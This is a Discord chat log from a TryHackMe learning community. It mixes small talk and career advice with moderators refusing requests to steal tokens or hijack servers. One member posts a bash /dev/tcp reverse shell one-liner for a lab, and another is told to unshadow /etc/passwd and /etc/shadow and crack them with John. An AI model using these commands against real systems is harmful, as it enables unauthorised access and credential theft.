#general
1 messages Β· Page 75 of 1
tries to hack him
We're ethical hackers in here.
eh maths is a big education industry
AIIT
Does anyone know how to steal a discord token, or some other way besides sending the victim a file and having him download it?
Why on earth would you like to do something illegal? π
lol
I really need to take revenge on one vile person
to go to jail of course
Two wrongs don't make a right my friend.
he is engaged in discrimination and provocation of people on the server
only good ethical hacking
Report him?
Then you report it to your local authorities and Discord support.
and this discord is focused about the website https://tryhackme.com
Boing
Vigilante hacking isn't legal, nor is welcome in this server.
Well, I really need to get its token, I looked everything up on github
You really dont need to get it
you want it
what you really need is a lesson on ethics
Are you sure this is the course of action you wish to take?
ethical hacking
its for cyber security not hacking ppl
yeah
go go power scrubz
ur welcome
I'll go look for the hacker discord
gl guys
txh
thx
theres no hackers discord
ur just wasting ur time
Oh no someone is provoking me I must commit the illegal π
i was that dumb but now nah
only minecraft
I got mad and that was about how far it went
Ok guys, it's being dealt with. π
let the moderators/scrubz handle it
Take it easy
just some scriptkiddos
Yup, still feels strange to me too, dw, lol
Only real pros use wurst client
you are doing fine scrubz
I guess that's the solution π
best one ever
yes
how to port colourscheme from .Xresources to all apps supported by other colour schemes???
i enjoy Kali's new wallpapers
bummer
Hi
sample of 1 of each, try everything
I have
I would show the error but Iβm not at my computer at the moment
haha, i was just being funny with username
Oh lmao
waiting for Kali to finish upgrading
@sick lance
hi shadow
ello veggies
If you wish to post jobs on TryHackMe, can you please ping @umbral bay for the process please. π
scrubz is blue, cool
There is steps to take to be allowed to post to the #jobs-board
haha
That song will now be stuck in your head all day.
You're welcome!
π πͺ±
*reminds shadow of the tumblr post about a race of telepathic aliens that loves having humans around as you can ask them to think about a popular song and due to ear worms the humans will "play" that song for the aliens
what benefit is there for the aliens to have human play a specific song?
social engineering example?
when bored and wanna listen to music make human think of song and just listen to their thoughts
okay
make some hashes then hash or john crack them
The new room.
find a password in rockyou
thats a heater
try to memorise all the passwords in order from rockyou.txt
there's a new room today?
hacksmarter room, medium level
yeah probably more sane to do this new room
yesterday was Pi day
it is easy.. it is just 14 million lines or so
shuffle the list and re-arrange them manually
if you cat them will be faster to list them and learn
another option is to find the emails in rockyou, there are a few
back as it was
does any anyone have any advice for me
Download Malware-bytes.
plenty to do for hours, a lot of them, you won't be bored!
Run a scan, see what it picks up.
Run defender scan
yeah I did that also used avast
So why do you think you were hacked?
I'm just worried about my information being out there
I downloaded malware off this guy claiming to want people to test out this game
I know im pretty not smart
I wouldn't say that.
I get those shady discord DMs all the time
I've seen people who are knowledgable in this field get caught out.
Almost downloaded one too π
Morning
Morning
What is love
don't hurt me
Makes me actually wonder how it's socially perceived, are knowledgeable people more likely or less likely to notify in a company environment that they are infected, or do they try to hide their stupid activity more because of embarrassment
idk is there anything I can do once they get all my personal info??
Well - what can they do with your personal info?
Also what info you got? Bank, creditcard? If those then call the bank asap
Really, if they already have info, nothing.
However it's hard to say what the malware actually done without diving in to it.
*don't answer that shadow don't answer that shadow don't answer that shadow don't answer that shadow don't answer that shadow *
thank god I don't have any of that on my computer
Gave +1 Rep to @whole moss (current: #475 - 9)
I mean its very region dependent and also what information actually was aquired, depending on severity, a lot of bad could be done
But also could be that nothing could be done
I did have tax information saved on my computer
I'm hoping they didn't get to it tho
Did you run the malware with administrator privileges? Was the software actively running that contained tax information?
no
the tax file was a pdf
I think they only got my password info but alot of it is outdated
Oh. do you still have this software somewhere available that they sent you?
Probably best deleting the message so you don't click it again.
definitely
Can you send me the link in defanged form in DMs?
Let's not ask members for malware.
the site itself seemed harmless
it was the downlaod on that site which was the malware lol
but yeah its cool I feel better
I don't think they hit anything that devestating
Best you can do now is report their domain for malicious activity, threat intelligence feeds will pick it up and may protect someone
how do I do that?
like on discord
oh the site link?
Yeah, the website you downloaded it from
thanks for the advice everyone here seems pretty chill
Which AV do you use?
Its a drawing i made
AV = Anti-Virus 
Good choice, do you have Malware-bytes premuim?
nope
Ah.
Free version is just as good.
has to rely on clamav as can't find any other good av for linux
question for the snort room it says to run a traffic generator shell. Do i just copy and paste the script into my terminal?
#room-help please π
oh yeah my b
altho complicated to me atm snort seems to be good stuff
does its job ...
it definitely can be
Woah. This is incredible, Discord.
That looks quite good
π
shadow annoyed that discord does not support colourschemes like dracula or catppuccin or nord or rosepine
psychopaths everywhere you go
Let's not do a Muiri 
why are you guys like this
I like chaos.
fair i guess
is that new or smth?
Yeah, Right click a user -> Mod view
cc @mossy river cool new discord feature
At first it was just to get reaction out of people, never fails, but now, I have started to like it
it's kinda funny tbh
Oh mate
10 years ago everything was like that
Yeah, I enjoyed the 10 years ago thing
Can everybody? lol
Can you do it?
Or only mods?
Wow that seems nice, you can see what role granted what permission too
Only mod, Mod view
is it in an office with bright lights behind it? light mode
xd
Yeah, a lot of information summed up nicely
minimize contrast between the screen and backdrop
I am also that kind of guy that has always lights on when behind computer, I don't like to sit in the darkness
late night white sometimes hurts eyes, so dark mode in my case is easier to work with.
in the room yes
but i mean behind the screen
I can't do it to myself.
otherwise the contrast gets old
ah yeah, my walls are light
this community is quite nice
btw Scrubz you cant do it for any role higher than yours right?
I find dark to exhaust my eyes faster
I can do everyone, except me.
oh wait thats strange
do me
Uh...
pause
it should be the same as editing roles, only the roles below your highest role. (if granted permission)
hello, how do i start my cyber attack
wow
i want to be a good black hat
lmao
Do you know what that is?
its your time to shine baby
Dont you mean white hat?
What is a good black hat?
You know that's illegal? right?
Right?
ah thank you
Gave +1 Rep to @sick lance (current: #2 - 2059)
yes
Nike has good black hats
5k aint bad
π€
I don't really follow the brands
I like the tommy hilfiger ones
I wear what fits
i want to be good at defense ...blue ?
Tommy hilfiger is nice too, their minimalistic styles are amazing
that is blue yes
What do you mean with yes?
not everything is red and blue y'all
best defense is of......
well manner black hat, i mean he can do what he want
there are things that are defensive that aren't blue
You mean like penetration testing
if you're adjusting firewall rules all day that's defensive but it's not blue teaming
personally im more of a maroon hat typa guy
Sorry mate, I don't think I can help you, I just don't know what you mean
i think it kinda depends on what time period of THM
@keen osprey this a community for ethical hacking, we don't teach any black hat material
when there was like 5 people, yes
π
π
π
π
yeah i want to be a good ethical hacking
sometimes white hat and black hat optionally attack and defends
then let me tell you somthing. THM is offering a once in a life time oportunity to learn ethical hacking
You should read this: https://www.kaspersky.com/resource-center/definitions/hacker-hat-types
yo
sup
I am not sure that is a very good example
#room-help Please.
blackhat means illegal, not that you attack legally!
White hat means you can legally attack and sometimes defend (although blue hat)
Depends what kind of firewall rules are you adjusting, ingress, egress?
mb
oh wait nvm
my entire job is adjusting firewall rules π
go to room help
its not meant to be
not really. blue team is defensive but defensive isn't always blue team
a square is a rectangle but a rectangle isn't always a square
Is it always DNS?
it's ALWAYS dns
exact same question
red team always plant a bomb
No I mean, if you are interactive with firewalls it could as well be part of blue team obligations, defensive can also be compliance, there you can't convince anyone that this is blue team
A bomb?
Unless you are in a role that actively engages with threats then you aren't blue team
Were not playing call of duty here mate
just like how bug bounty hunting is not red team
sorry
Red team operations should change their name
it's become a huge misnomer
Printing this for my network engineer friend
If your job is to feed IOCs into firewall rules because of bad maintenance then you are doing the grunt blue teaming work
And i should start with my school assignment (must be handed in in an hour)
Damn
many black hat is more skilled and go jail but the idea was while he got a free ticket to become cybersecurity consultant after served time in jail
blue team is the direct counterpart to red -- if you're countering a red team, you're a blue team. if you're feeding in IOCs from a third party provider, that's not blue team. if you're feeding in IOCs that you found from your red team, then you can be blue team
are you thinking of kevin mitnick?
didn't he pass this year?
yeah
rip
Are you saying that you are only doing blue team if you are doing active incident response?
you dont need to go to jail to become a cybersecurity consultant
blue team is the direct counter part to a red team --- if you have no red team, then you're just a threat hunter or an incident response team or whathaveyou
And doing bad things doesn't make you more skilled
I think adversary threat emulation is a good alternative name to red teaming
But threat hunters, incident response teams are considered blue teams
red teaming is a fine name imo (and very conventional for other industries too), but a name like that would be much more likely to retain it's meaning over time (unlike red team)
ngl, I enjoy a regular, legal salary, without having to look over my shoulder, and jail/prison does not sound fun
they aren't one tho. it's a misnomer.
just like how companies call bug hunting "penetration testing"
just cause they like the name doesn't mean it's correct
Probably best changing to topic,
Serving jail time isn't worth it.
mans gonna come back to a hundred pings lmao
i gots to goes
any of yall had boba before
π
made my own but i undercooked em. now there rock hard in the middle lol
damn
like eating a rock
i love eating rocks
but with a squishy exterior
Okay yeah, you are right, looked up the definition @molten sky Apparently term blue team only applies to a mock situations
where there is active engagement
Anyone into sff machine? I am planning on building one and I am thinking of going with fractal design terra but still open to other cases
idk where that definition is from but I'd very heavily disagree.
Blue teaming encompases a variety of roles, security engineering, SOC analysts, IR, etc. You are as proactive as you are reactive. Any role that is implementing security measures, monitoring, collecting threat intelligence, etc, is safe to consider as "blue teaming"
I got it from NIST
could you link? π
whats the difference between icmp and http
i am surprised NIST are putting it like that unless there's some context that i'm missing
icmp is ping http is low standard web ?
Or you can go there from here https://csrc.nist.gov/glossary/term/blue_team
Those two are very different
ah. I think i'm geoblocked
are you fimiliar with snort?
The group responsible for defending an enterprise's use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team).
CSRC Content Editor. (n.d.). blue team - Glossary | CSRC. https://csrc.nist.gov/glossary/term/blue_team
all kind of red flags puped up when i kliked that link
Nope
uh?
And I would otherwise heavily agree with you, but as I went just to hunt for confirmation, I stumbled on it
Purple teaming if you mix it with an active red team engagement
is there a standard iq for become good ethical hacker?
no
I mean, why does it matter? lol. Call it whatever you want ~ This is for blue team discussion
IQ does not equate to intelligence
Ahh that is odd. Yeah I do see their definition. For the first time in my life, I disagree with NIST haha. IDK if the definition is old, or is specifically written to have some nuance, but blue teaming isn't just responding to mock incidents / responding to red team efforts. Sure, that's definitely an element, but again, there are roles where you are proactive - monitoring for attacks, incidents, etc, that may be from a legitimate threat and not just a mock scenario
Yeah, honestly, NIST should update their definitions
I would 100% put IR into Blue Teaming, not just "IR"
along with other supportive roles
At the end, they do mention a blue team can exist without a red team so idk y they worded like that in the beginning passage
I mean it makes sense they want to call it based on army terminology, because out in combat you don't also call enemy a red team
yup. Blue teaming has definitely expanded to be a bit more of an umbrella term. Maybe the definiiton there is thinking of it "traditionally", but absolutely a modern definition would include the above roles/responsibilities
Agree
that's where the terminology derives from but in IT it has already become de facto terms for goodies and baddies
ai version of blue hat
IMO the color teams are 100% marketing bullshit and don't really apply to sane orgs
Ya call us baddies, huh?
fr
oh yeah 10000%
Similar to the hats
Yeah, people get confused with that
It's useful way to explain stuff to people without the understanding of what the various roles in cybersecurity are
I promise both goodies
but other than that.... it has no meaning within the industry
Other than narrowing down what you do without wanting to explain
these terms r just used in the learning phase ig
How does that do that, when someone doesn't understand enterprise security
it's just another flavor jargon term
im gonna make some fried eggs
but that's not what i do with my security engineer role
"computer policeman" is possibly even more useless unless you actually work as law enforcement and specialize in cybercrime
I guess it also depends how much they care about the details or is it just some general overview
yeah, I mean, in the industry you would expect someone to know what you do based on your role. Oh I'm a soc analyst, etc.
For the non-technical or as a general seperatation, the blue team is like a "oh I stop hackers", red team "I pretend to be a hacker to help organisations". Etc. It's very shallow I think intentionally
I just tell people I work in IT
Because unless they also work in IT, whatever else I say is meaningless to them
I have learnt that saying it can be a headache because IT means coming to you with problems like "can you make me a web page"
I certainly can help with that
you know I just work for one of those ABC agencies. nothing too important.
my consulting rate is $350/hr, $250/hr if we're friends
will I? no. LOL
that usually puts a stop to that
pay my rate, i don't care if you want me to sweep the floors
i've definitely had consulting customers burn a significant amount of hours have me babysitting an empty cage instead of deploying products
maybe better to say "computer security guard" then
juun, played season 2 of the finals?
Better to not talk
oh, the password security discussions i have with my family
"I work with computers"
"don't use the same email/pass everywhere" "but then i have to remember things!"
Keeping the Internet safe.β’οΈ
And if anyone asks to help me fix stuff, "oh, it's my job to break them"
so you want to go to jail?
I introduced them to password managers, particularly, Appleβs one.
Yeah, I have done that too. "But now I have to remember another password"
Hahahahaha canβt argue with that
Only if my opponent has all the hotels in Monopoly.
Lol
At this point its the cheapest room to sleep in
Monopoly... so you have choosen death
On one hand, Iβd like to ask how does one become an external IT consultant for others without being tied up to a company?
Helo
"Can you hack x's instagram?"
When a room is in network state : resetting , how long does it take roughly ?
is there a way of ethical hacking to manipulate / hack server so they can mining on it
About a minute.
Hi @umbral bay not sure if this is an appropriate question but what certs does THM recognize in the discord?
Is there a way to ethically legally rob a house?
Ok Iβm still waiting
All you rmessages tonight have not really been really ethical my friend... π
Ok, not all, most.
Which one are you looking for?
If you're hacking something, so you can run a mining application on it.
Does that seem ethical?
Shh

yes, i dont rob the server just as a guest
Idk how to send without embeds on mobile
But you're planning on installing something without a users consent and/or knowledge, are you familiar with the "Computer Misuse Act" ?
<link>
no my friend im 16, still looking for career path
We don't have that one.
@mossy river
You won't get very far with the current attitude...
Scrubz is on it
π, what do we have π
A crazy amount actually, the usual ones.
Planning to take only certs that THM has roles in kek 
Is there any GIAC ones?
Oh, can I get GDAT on my profile?
Idk can you
Asking the mods/admins
I can't assign it yet, you'll need to wait for a mod to come, or tim if he ain't busy.
Are SANS just courses and GIAC are their relevant certs?
Yes
I always thought they were separate bodies
I think you should have a read over the #rules again, number 4 to be specific.
Like GIAC only prefers SANS courses but you can learn from other stuff
ok π sorry sir
Nope, GIAC is SANS, you can do the exam without their materials as well but it could be hard
next time you'll be banned
π mini-modding are we?
mini-modding is not welcome, and it can make situations harder to moderate. π
Please stop.
What is the cloud training section about? Is it included with the subscription?
It Is not, due to the expense it's a separate purchase.
Something should be wrong then , still resetting. Iβll come back later
can you tell me an IP address of a machine that you see on the network map in the room? I can look on the backend to see the actual state of the machines
@lone thistle Hey, can I get GDAT role on my profile?
The DC has 10.200.64.101
Iβm not a moderator alas, youβll need to wait until one pops in
Cool cool. Iβll have a look
Thanks
Gave +1 Rep to @lone thistle (current: #7 - 827)
i cant with this
Oh okay, I will keep waiting till someone pops in then, thanks anyway
Yup:) the people on the right at the top of the server list in green are able to do it ππΌ
They swing by fairly often so
hello
i know it's a question that has already been made but when is dark theme coming?
2 months TradeMark
O.o. I can't even see that machine as existing, neither does anything else on x.64.x. How odd.
Can you leave the room by clicking on the grey cog, leave room, and re-join it after about 10 minutes?
what?
obscure reference but basically the same as saying
SOON
mhmh i see, thanks
Done. π₯³
Cheers!
Ok Iβll do that
read books, have notes basically and note cards. Learning from objective based such as certifications and gamified things like Python Scripting from HackerRank. Most books have projects and those are the best ones but anyways just keep looking to obtain things and nonstop grind. Of course your not going to remember everything if your in multiple subjects at once, hence why some people get lower grades than others.
Differnet subjects have differnet techniques of learning, coding is obviously just reading and have logical thinking outside of having calculus in your arsenal.
anyone here taking the evilginx course, please i'm having issues with gmail
Tried asking in their discord server?
- Flashcards
- Paraphrasing
- Teaching others (or even just speaking out loud)
- Applying what you learnt to a real scenario
apparently π I have an issue with spotify customer services can I ask here π π
My speaker is broken. Anyone know the fix
Same , sometimes I donβt remember when I put my notes π
Just be relaxing at work trying to get through the night
Honestly the more you use what you study the more likely you are to remember it. I am very bad at memory stuff, so I prefer having a good reference that I can look at whenever I need a refresher
Figure out what works for you and do that
I like notes do I do notes
Join the discord if you want to
https://discord.gg/Bq2Am7uXUX
Join here if you want to be a supporter
https://www.youtube.com/channel/UCc0j-JGHDR64bDpP6tW0iBQ/join
i think that madam webb is my no1 dumb ass movie ever
Clearly you have not watched star trek into darkness
I really want to watch madam webb, seems fun in a hatewatch sort of way
did... not impressed....
madam webb is movie with nothing of nothing. if i stare intro wall for 2h ill be more mussed =/.
any of you guys still use IRC channels? :P
that is how you start halucinating...
even that is more fun =/
depending on a few factors yeah it can be fun
true. but movie is 1st class shit... just shit... no action, nothing that will make it worth of watching
is it normal that an nmap scan with all ports ( -p 1-65535 -T4 -A -v ) takes like 3 hours to complete? 
what command exactly?
on thm ?
i mean it found 2 open ports right away but then stuck on SYN Stealth Scan Timing for 1+ hour
45% done after 1 hour and half or so
i guess it's because all ports
there is no scan on thm that need that amount of time. and not sure to what room, but no need to run that long
think about how much time it takes to get a response from an open port vs a closed/filtered port. What's the bottleneck? Now multiple that by the number of closed ports.
anyone know about format strings and how to exploit em?
shoot me a dm
im goin braindead
actually i have no clue there lol, does it take much more time to get a response from a close/filtered port? Thought it'd be as fast
no it takes the same amount of time if not 0.1s more
also how tf do yall have different role colord
don't give bad information.
colors
Timeout is configurable, default timeout is more than you think. It's not 100ms.
for me it takes like less than 1s
if port is open then you prob get "instant" respond. for other state of ports you prob need more time. depend of how is set on system
and nmap by default, don't scan UDP ports. if you scan them then it can take ages
then yeah i suppose scanning all 65k takes ages
why tf would u do that
with default settings anyway
If you want an exhaustive check, that's what you have to do. Sometimes CTFs (and sometimes admins) will put services on high unprivileged ports just to make things harder to randomly discover.
bruh
security through obscurity
if it works, it works
Common offsets are multiple of 8k or 10k, but there is no 'best practice' or RFC that makes recommendations
Neither of those ports are valid
works with some applications
65535 is the highest possible port value
no u can have higher
nop
autopsy binds to 99999
Please link me the RFC
how would i change the settings to make an all-ports scan go faster, you'd say?
first think, do you need scann all of them?
You should recheck that. You are wrong.
I wouldn't scan all ports until I'd exhausted other options and I was sure there was something I'm not finding. Top ports, increase concurrency, decrease timeout for TCP responses, more aggressive scan profile are all things you can try. Which room is this for?
fjodor will go crazy if that is case π
sudo apt install autopsy
then do autopsy
and see what happens
Why would I install it? I just actually checked the official documentation.
bro im literally using it right now im on port 9999 localhost
9999 is not 99999
Yea, 9999, not 99999 as you originally said. 9999 is an allowed port value, 99999 is not.
Does anyone have good wordlist recommandations?
oh shi im dumb lmao
For a specific room, @versed prairie or just in general?
It's ok, we all start somewhere. Don't worry about it, just accept the lesson and keep learning π
For the THM Rooms in general
Most of the rooms that require a wordlist will tell you which one to use
But is there a pack with all of them in it? π
Seclists on Github
They will also tell where to find the wordlist. Sometimes it's github, sometimes it's a download in the room task.
ok thx π
Gave +1 Rep to @whole yew (current: #10 - 736)
ugh i forgot who it was but someone recomended a video that explains ports
forgot who it was sadly
i remember this conversation
wasn't me who sent the vid tho
ikr
very situational too
i remember it off the top of my head
like i have wordlists half a TB in size that I multiply with permutations
maybe they will speak and i will remember them
you're not gonna want that for most things
not gonna use rockyou for directory fuzzing
many people make their own as well for certain targets
was it this one @crude stump
nothing special lol searched for "ports" in messages sent by you than just scrolled down a bit
π½
Damn
sniff pepper to induce a sneeze?
watch clips of someone yawning to induce yawn
That's what you call a great start of a birthday
But you revealed our secret, @boreal scarab .... Sending Mauses to your haus
meep meep this a comfy bed for sleep sloops to the beep boops while the moop moops
english only!
bad!
Oh hey shadow, how's the day been?
ZzzzZZzzZzzzz
Shush lemme flex my deutsch
to answer honestly just before shuting down computer... friday was good.. watched a lot of development for neovim plugins and update shadows config using the modular kickstart.nvim
also looked into some fun android stuffs
That's nice, I abandoned neovim since setting it up was taking more time and I was supposed to be productive with it and not tangled in lua web
Why not ios
can not affords and not as good for open source apps
True, been thinking of getting into android malware rev but I don't know what to do at this point
Pentesting, SoC, cloud security, Security Researcher
get to 0xD on tryhackme and ask for guidance in the advanced channels
I can moon walk, does that help?
i want 0xD just to shitpost in advanced but i also don't wanna get 0xD cause lazy
Do it, get 0xD already
its ez pz for u
Hmmm aight I still got 2 months before internship. The only sad thing is college won't leave me alone and I'm still ahead of em so it feels like a waste of time to go there but I have to
Hey there Mknukn
What does your name mean tho
anyways time for that sweet sweet release of sleep meep beep sloop moop boop times
I have been good, kinda anxious but good. Also been grinding student sub of htb academy recently
Its an acronym for word play in the common language in my country. its direct translation is βiβve loved you ever since the first day i met youβ
G'night~
nice htb academy is good. What modules are you doing?
I'm completing the Penetration Tester path
But gotta finish the intro to Asmx86-64 and intro to malware analysis first
Also shellcode and payloads
I'm going reverse Tier 2 -> Tier 1 -> Tier 0
How you been @simple valve ?
Thats great, i hope youre not getting bored by their walls of texts but their content is super good and i wish i had more time to tackle it on
Actually, I'm pretty good at reading stuff
But you should try Tier 4
It's heaven
I wish I had that, I hate reading long walls of text
The payments are super wild π, i cant afford it right now
Start small by reading blogs and small books
True, but you got student Id?
But Im doing CRTO rn and just passed my ASCP exam
Nope i do not, i am unfortunately a working individual now
You can accumulate 1600 cubes by doing till Tier 2
Darn tax eating my paycheck
Dang it
Afraid of that too
Damnnnn congrats man
eeeek
Thank youu
Gave +1 Rep to @heady nova (current: #209 - 25)
Hope to see you with a certification soon, CPTS perhaps π
Anyone read this book
if you close your eyes, its like its not even there
Oh my
Wut, rust is lob
ahaha. trueee. Trying to make a bit of a dent in this. RustScan needs a bit of TLC
It looks interesting especially because itβs by Cisco
That's what I'm prepping for
Just happy that finally I'll have something solid on my resume
Good luck! The badge looks nice on the HTB Discord since its beside your name
Hahaha I'm on their discord but never chat
do you maintain this project among other things?
I mean alongside other developers
That reminds me, I'll take CCNA soon
i'm on the core dev team yeah but uh .... I haven't contributed/maintained for quiiite a while π
Thanks
Gave +1 Rep to @crude stump (current: #239 - 21)
Iβd understand that. I canβt imagine myself maintaining a tool always on top of my other responsibilities, must be hard work
Salute to all OSS devs π«‘
Also happy BDay!
Thanks man π
idk what this one is from but one of my favourite things in battlefield used to be sniping jets and helicopters out of the air with tanks on the other side of the map
Happy birthday
Thanks dude
Gave +1 Rep to @past sparrow (current: #322 - 14)
You could do that?!
I may be wrong but I think itβs from warthunder
yeah just gotta aim
#room-help I think is a better place to ask your question
Youβll get much more streamlined help
Either this or world of tanks but nobody plays that game lol
i had a feeling that might be it but i wasn't sure enough to really say
wot was the alternative
haven't played that in years
Ikr
it used to be good actually
has anyone tried the new room (hack-smarter-security)?
#1218273577720348802 channel
if you want to find others that are currently doing/have done it.
That one would be WoT
Doing a ctf
Directory traversal found
Can't figure out which file to retrieve from the server
How can I enlist dirs content
I have etc passed
Never got to exploit it
Any ideas?
Do you have etc/shadow and etc/passwd ?
I hav passwd
If you have etc/shadow , unshadow it with etc/passwd and use John
Is this a CTF from TryHackMe?
Oh okie, I think youβll better have help asking in their respective forums and whatnot.
How to bypass :// for php wrappers
I tried encoding
Url url hex
Any other way around?
#!/bin/bash
bash -i >& /dev/tcp/10.10.32.110/8080 0>&1
is this command good for a reverse shell?
Potentially ?
? what you mean
Itβs a possible reverse shell to 8080/TCP on said IP but it will depend on your environment
For most scenarios; yes itβll work. It will most definitely be caught by something like SecurityOnion
I'm exploiting a cron job to get a reverse shell root of the target system, however I'm listening with ncat and haven't received anything
In terms of a help desk; Make sure you have a VPN connection to THM infrastructure.
In terms of Offsec; Make sure youβre exploiting it properly. (IE: cron jobs are running, no firewall rules blocking that outgoing port, etc)
There was a small error in a misplaced character, thank you anyway
Gave +1 Rep to @sinful thunder (current: #2025 - 1)
Hey guys
Thank you for having me here
Please I have a question. Am new to IT/ cybersecurity am a newbie. I want to start my career in cybersecurity. The Tryhackme is it a good place to start?
Thank you
Go for it , itβs great. Plenty of labs with hands on, youβll learn a lot
Wow. Thank you π
Gave +1 Rep to @fresh cobalt (current: #2025 - 1)
Thank you π
Gave +1 Rep to @blazing granite (current: #139 - 48)
Hi @graceful thistle !!
I have not seen you around in quite a while
How goes it in NZ (?)
@buoyant tree Sup!!!
hullo
listening to a cover which I am not even sure falls into a proper genre
I'm drinking πΊ
Hi Drinking, I'm Vain π
that was indeed, quite a vain answer π
Personally I prefer using my own machine
really depends on your preferences
I like attackbox more since I don't have to spin up a VM every timei
Hey, anyone here plays phasmophobia?
I don't play with phobias π
Hi guys, I am looking for a vulnerability in Version 5 of rar for open a file with a password, can anyone help me in that?
What are you trying to do?
Find a vulnerability in that version then exploit it then open the file ππ
.
Sounds unethical, I believe nobody will help you here, it's against the rules
But the vulnerability deja known by rarlab and they create a new version for it, it is just for learning
please don't press the matter any further, we're happy to help you with anything tryhackme related
Guys i was doing eternalblue room on thm. i was able to exploit but cannot create a session. i am getting this error. Any help??
[] 10.10.150.14:445 - Sending egg to corrupted connection.
[] 10.10.150.14:445 - Triggering free of corrupted buffer.
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.150.14:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Try and reset the room
@grizzled crystal may i DM? Someone i know is starting an A11Y cyber security podcast and i am helping them find other people to talk on it
Morning
Tried it out.. not workingπ₯²
try again, windows and eternalblue can fail from time to time
if still not working after reasonable attempts - might not be the correct exploit
Sure I'll I give a try
I used the exact same thing given my the room.. options are set properly.. idk the issues coming from
Stick to #room-help for this please.
good morning
Looked at Locked Shields lineup for our team, I am so happy I get to be in Windows team ...
erveryone else I know "Uncertain" π₯²
I don't mind it though, glad they knew what I wanted to do in advance
get to see my old colleague as well so thats a win
Not so sure its a lonely path
Depends on the questions your asking, I suppose.
line is determined by if you ask for sake of asking or you geniuenly want to know
Though often time the answer can be "you can look it up in 2 minutes from google"
I have a question
Depends on the question, we may, or may not have an answer.
Do I need working knowledge of any programming languages before starting my career in cybersecurity?
No
So I can start without any knowledge of programming languages?
Yes
Companies accept such candidates who has no knowledge in programming languages if they were to apply for any position related to cybersecurity?
I think you should elaborate your questions tad bit more, or narrow them down, because I am answering for the whole scope of cybersecurity now. Including compliance.
So, yes, to your latest question
All right, let's say I want to become a penetration tester for a company. Will I require any working knowledge of programming languages?
It's doable, but you will be tool dependent and you won't be able to modify it to your liking and to company specific environment, so if there is a constant argument that is purposefully different in the company you are penetration testing - your tool is useless
List a few programming languages that will be useful if I'm to become a penetration tester.
Javascript, Python, Java, PHP
not exactly programming languages but also SQL and powershell
Most penetration testing jobs on the market are for web apps and phone apps, its not often someone wants full domain penetration test
Thank you for answering my questions.
Gave +1 Rep to @past sparrow (current: #307 - 15)
No problem and good luck
Quite possibly
Either that or something similar likely will be there
Very possibly I'm afraid
guys, how can i verify my thm account here?
@exotic lark
ty
Heya, how are you? π all is well here, just going home now from a really long dinner party haha
Every SOC center is different,for example in mine we use ELK only for network,and for other things we have some inhouse made SIEM. Usually people go with ELK,Splunk,Qradar, Azure Sentinel..
Anyone has a gaming laptop?
Plenty of that work about
Do you?
Might also depend on region, I am more familiar with European market than U.S or Asian market
Me too, but I have different experience with that
I work for an MSP, and it is pretty common to do penetration tests
Oh, I am not saying that Domain penetration tests are uncommon, I am saying that the demand for web pentest is a lot higher
ah in that way
I'm not in the US
I may be wrong though and our company just gets more web stuff than any other things
I'm from Asia market and am in house tester for our web apps and APIs
web and phone apps
how do your phone app tests go?
if you dont mind me asking
How hard is to test house? 
Oh I am not a pentester but from what I have heard from the red team's bi-annual reports they are quite successful in that (whatever that means)
Are developers not good or our pentesters very good, that I don't know
I found that testing mobile apps (especially made by big companies) are pretty boring, where internal infrastructure tests reveal more critical vulns
Probably because itβs easier to harden one mobile app (especially that most use APIβs) than to secure 20k or more hosts running multiple services
No
My gaming laptop lasts less than 2 hours is there anything I can do it was 48whr battery
Keep it plugged in
That's how gaming laptops work
Why would you even get gaming laptop,build SFF PC and have one cheap thinkpad for playing with linux 
BUT dont build to small one,because your cat will need warmth β€οΈ
only thing you need is a laptop with 1 USB-C port everything else is reduntant
Stop overcomplicating stuff dudee,just learn basics and when you get job in soc ,they will show you everything.
You read out only 4 from that list? ποΈ π ποΈ
ELK is acronym for 3 tools
But yeah, learn 1, knowledge will somewhat carry over
exactly, everything can be learned on the job
why stop at there, make it HELK!
now this can be fun
Till now it was mostly plugged all time
But today I used without charger i used youtube and browsing it only lasted like 2 hr
What SocAnalyst tier are you?
My gaming laptop only lasts 2hrs
2/3
Thereβs also βBeatsβ
But not in the acronym π
So you are threat hunter and also digital forensic?
yeah, I just expanded that there is more than 1
and IR
Do you also have to write scripts for detection or do you have sepearate team of detection engineers for that?
but yeah, digital forensic is part of IR
I prefer writing my own scripts for most things, we don't have separate team for that no
if I can't find it via script I find a work around
My friend from chicago is tier 3 analyst with 6 years of expereince,has over 100k salary and cant write scripts lol
He says there is whole department of guys who do just that π
yeah no, I like the idea of composing what I look for myself
if you have team doing the script writing for you, may as well replace you with combined script tool
Do you have any tips how to start with writing scripts? My knowledge is very shallow,i can write only basic bash stuff..really basic lol
My plan is to learn JS/PHP but at the same time i would like to script in python and idk how to combine all that learning π
depends on what you really want to use the script for
start writing atom queries / tasks
and combine them over time
make sure atom works first, before combining
script doesn't need to look fancy, it just has to get the job done, online documentation is always there to help
If you need to deal with windows devices, then for starters can start learning PowerShell
π«‘
Just like all things, it needs practice and uh
things that never start take longest to finish
looks quite good
death note is nice for sure
You painted this?
nah. laser engraving
cant help that im overthinker
It's probably a stupid question, but if i'm doing a reverse shell in a room over VPN how do i get my IP?
ip a then find the relevant tun IP
You can also visit the tryhackme website and go to /access to see your IP.
I don't have a tun IP. I think i don't have it cause im going through a OpenWRT Setup that is connected to the VPN? Could this be the problem why i dont get my connection?
ifconfig should do
its my first time learning abt thsi stuff what learning path should i taek
ty
why dont they just add that path recommendation list to the site, for example as recommendation right after signing up
Renders well on slate
app havce nice filter. Dieter. it turn color and shades of color into 255 shades of grey and auto power and speed of laser to achive effect
Assumed as much
At least for the greyscale and laser power
as this
for that its caled bas relief picture
https://www.laser-pics.com/ page with prepared for laser
around 80% thm is free
which ones arent
some are one that you get if you subs to thm. not sure what ones are paid. you can use search tab to list them as wish
for the most part i can get through the basics for free?
No entire paths are paid (other than the AWS one) there's always free and subscription based rooms in each path
ill say yes
ight ty
No, tha paths have subscription room.
@shell nova also this. aside i used less power for effect. but yea. that is that auto filter
